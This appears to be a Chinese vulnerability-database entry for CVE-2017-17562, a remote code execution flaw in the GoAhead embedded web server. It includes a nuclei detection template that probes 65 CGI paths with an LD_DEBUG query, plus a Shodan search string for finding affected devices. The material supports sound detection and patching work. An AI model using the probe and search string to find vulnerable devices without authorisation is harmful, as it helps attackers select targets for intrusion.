Embedthis GoAhead Remote Code Execution Vulnerability

漏洞信息

漏洞名称： Embedthis GoAhead Remote Code Execution Vulnerability

漏洞编号：

• CVE： CVE-2017-17562

漏洞类型： 命令执行

漏洞等级： 高危

漏洞描述： Embedthis GoAhead是一款轻量级的嵌入式Web服务器，广泛应用于各种嵌入式设备和网络设备中，用于提供Web服务。由于其轻量级和高性能的特点，GoAhead在物联网(IoT)设备中尤为常见。该漏洞影响的是GoAhead 3.6.5之前的版本，当CGI功能启用且CGI程序动态链接时，攻击者可以利用此漏洞执行远程代码。

漏洞的技术根源在于GoAhead Web服务器在处理CGI请求时，未能正确验证用户输入，导致攻击者可以通过构造特殊的HTTP请求，利用环境变量LD_DEBUG来执行任意代码。这种类型的漏洞属于命令执行漏洞，它允许攻击者在目标系统上执行任意命令，从而完全控制受影响的系统。

此漏洞的影响极为严重，因为它不需要任何形式的认证即可被利用，且可以被自动化工具大规模利用。成功利用此漏洞的攻击者可以远程执行任意代码，导致数据泄露、服务中断，甚至可以作为进一步攻击的跳板。由于GoAhead广泛应用于嵌入式设备，这些设备往往难以更新和维护，使得该漏洞的潜在影响范围更广，修复难度更大。

产品厂商： Embedthis

产品名称： GoAhead

影响版本： <3.6.5

搜索语法： cpe:”cpe:2.3:a:embedthis:goahead”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fcves%2F2017%2FCVE-2017-17562.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2017-17562

info:
  name: Embedthis GoAhead <3.6.5 - Remote Code Execution
  author: geeknik
  severity: high
  description: |
    description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability.
  reference:
    - https://www.elttam.com/blog/goahead/
    - https://github.com/ivanitlearning/CVE-2017-17562
    - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
    - https://github.com/embedthis/goahead/issues/249
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17562
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-17562
    cwe-id: CWE-20
    epss-score: 0.94053
    epss-percentile: 0.99889
    cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:*
  metadata:
    max-request: 65
    vendor: embedthis
    product: goahead
    shodan-query: cpe:"cpe:2.3:a:embedthis:goahead"
  tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis

http:
  - raw:
      - |
        GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    payloads:
      endpoint:
        - admin
        - apply
        - non-CA-rev
        - cgitest
        - checkCookie
        - check_user
        - chn/liveView
        - cht/liveView
        - cnswebserver
        - config
        - configure/set_link_neg
        - configure/swports_adjust
        - eng/liveView
        - firmware
        - getCheckCode
        - get_status
        - getmac
        - getparam
        - guest/Login
        - home
        - htmlmgr
        - index
        - index/login
        - jscript
        - kvm
        - liveView
        - login
        - login.asp
        - login/login
        - login/login-page
        - login_mgr
        - luci
        - main
        - main-cgi
        - manage/login
        - menu
        - mlogin
        - netbinary
        - nobody/Captcha
        - nobody/VerifyCode
        - normal_userLogin
        - otgw
        - page
        - rulectl
        - service
        - set_new_config
        - sl_webviewer
        - ssi
        - status
        - sysconf
        - systemutil
        - t/out
        - top
        - unauth
        - upload
        - variable
        - wanstatu
        - webcm
        - webmain
        - webproc
        - webscr
        - webviewLogin
        - webviewLogin_m64
        - webviewer
        - welcome
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "environment variable"
          - "display library search paths"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220439368ea57fa7f2780d0f62691dea8bda8f6732b6a9a7567ca070068b7f5dbb1022010e0d2939d9cabcc856f6eeede1b167f8ca2934368dfe9f1e8dbab824255ae64:922c64590222798bb761d5b6d8e72950